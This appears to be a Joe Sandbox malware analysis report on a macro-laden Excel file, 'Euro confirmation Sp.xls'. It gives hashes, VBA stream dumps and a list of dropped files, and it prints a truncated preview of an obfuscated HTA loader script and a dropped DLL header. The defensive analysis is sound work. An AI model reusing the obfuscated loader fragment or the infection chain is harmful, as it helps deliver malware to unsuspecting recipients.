MD5:	FCCAB384CF7D38618313385C0E22638B
SHA1:	6E0EFBB76A4D4B39A82B7D84393F399EA431B07E
SHA-256:	FC357D0488D2BE1A5A49893D842E24D303250346DAD592F6B1C8A9511EDC15D2
SHA-512:	72C9BA041CBEBA138A2E02AC8CCB726C58ABAA834386A09C203B9E9F9759E0F4C6E5F2AB3C29AB05F93E573195ADB8E43A8A89811505084851EFF6748F28A4AF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood[1].hta, Author: Joe Security
Preview:	<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74%69%6F%6E%20%70%72%6F%76%69%64%65%64%20%62%79%20%74%75%66%61%74%2E%63%6F%6D%20%2D%2D%3E%0A%3C%21%2D%2D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%32%31%25%34%34%25%34%46%25%34%33%25%35%34%25%35%39%25%35%30%25%34%35%25%32%30%25%36%38%25%37%34%25%36%44%25%36%43%25%33%45%25%30%41%25%33%43%25%36%44%25%36%35%25%37%34%25%36%31%25%32%30%25%36%38%25%37%34%25%37%34%25%37%30%25%32%44%25%36%35%25%37%31%25%37%35%25%36%39%25%37%36%25%33%44%25%32%32%25%35%38%25%32%44%25%35%35%25%34%31%25%32%44%25%34%33%25%36%46%25%36%44%25%37%30%25%36%31%25%37%34%25%36%39%25%36%32%25%36%43%25%36%35%25%32%32%25%32%30%25%36%33%25%36%46%25%36%45%25%37%34%25%36%35%25%36%45%25%37%34%25%33%44%25%32%32%25%34%39%25%34%35%25%33%

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.835779101290385
Encrypted:	false
SSDEEP:	24:etGSwPBe5ekrl8y72fukzOCa0H7Hf9LWtkZfTRDgRCbCZ0WI+ycuZhNtakSrPNnq:6/skr+vf3OCb/lZJd8MbCZX1ulta3Bq
MD5:	E2A59730C24419434A590ED0B0BB1D90
SHA1:	9B7179AF6EE891F514882090F2A670FEDF590BB2
SHA-256:	A3149DC2FAE2806575459327C387696861CE858FD1D76F549D5B6BCBF7AE4BC2
SHA-512:	9E95769C84DBF5D4A6A723D5A7BB62C06B03BC672DAD274EF2EBE634B017FF29A5CFBFBB47F2FF0E6BC8C7DE67910F7A747DF5C155F1C4278423B420051C5C60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....I[g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+.....u.....u.......................................... 9.....P ......K.........Q.....U.....`.....l.....n...K.....K...!.K.....K.......!............9......................................."..........<Module>.5d

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Dec 12 07:21:32 2024, Security: 1
Entropy (8bit):	7.737585452139877
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Euro confirmation Sp.xls
File size:	1'062'912 bytes
MD5:	ee0c6a4698481c48bbc55b9a33589a54
SHA1:	2abeddd26326a6dd0511c67069b0b21837e047b1
SHA256:	65e15997e0ceb72609fc8a3c0cc0453ca08d98d16485163863325fba17bda28a
SHA512:	80305c92221c1157fb94d8c081eab056080d7588d40d43237dda61604e9ecd7fdf541e08a7636dba9e948e24a47804fd737721697a49598a8026fece1dddafa0
SSDEEP:	12288:z8jmzHJEUiOIBUzMTS9D3DERnLRmF8DEEPrxpsAQx1Zj+jJEPybDSjIHfXtuVHVs:HBacbARM8PL8Z+jETjIHfXWO7VmAL
TLSH:	C735F1E8B78DAB52D619423475F3939E1724AC03E902423736F8771D2AFB6D08943F96
File Content Preview:	........................>........................................................... ...!..."...O...P...Q..............._.......}..............................................................................................................................

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-12-12 07:21:32
Creating Application:	Microsoft Excel
Security:	1

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

General
Stream Path:	MBD00609F23/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' u . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c8 18 27 75 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c8 18 c3 12 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . g . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c8 18 0e 67 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c8 18 7e ac 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.250350317504982
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . w f L . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

General
Stream Path:	MBD00609F22/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00609F22/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	12479
Entropy:	7.09513886571729
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a7 95 f9 99 84 01 00 00 14 06 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00609F23/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00609F23/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.701136490257069
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00

General
Stream Path:	MBD00609F23/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	220
Entropy:	3.372234242231489
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	MBD00609F23/MBD0018D4CE/\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.5689955935892812
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Euro confirmation Sp.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood[1].hta

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\verynicebeautifulpictueforentirelifekidsgivenmebackwithnew[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D58A64D.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48E2187C.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7ABE9CDF.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\80DB06D6.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89368AEE.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1A6061.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C34579E9.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD481FEA.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F56D29E0.emf

C:\Users\user\AppData\Local\Temp\13ucrpna.fzg.psm1

C:\Users\user\AppData\Local\Temp\1rndzsii.grq.ps1

Windows Analysis Report
Euro confirmation Sp.xls

General
Stream Path:	MBD00609F23/MBD0018D4CE/\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	4
Entropy:	0.8112781244591328
Base64 Encoded:	False
Data ASCII:	. . . .
Data Raw:	00 00 03 00

General
Stream Path:	MBD00609F23/MBD0018D4CE/Contents
CLSID:
File Type:	Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
Stream Size:	197671
Entropy:	6.989042939766534
Base64 Encoded:	True
Data ASCII:	C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00609F23/MBD0068D442/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00609F23/MBD0068D442/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	26243
Entropy:	7.635433729726103
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00609F23/MBD007203CB/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00609F23/MBD007203CB/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	248
Entropy:	3.0523231150355867
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	MBD00609F23/MBD007203CB/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	256
Entropy:	4.086306928392587
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c \| E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
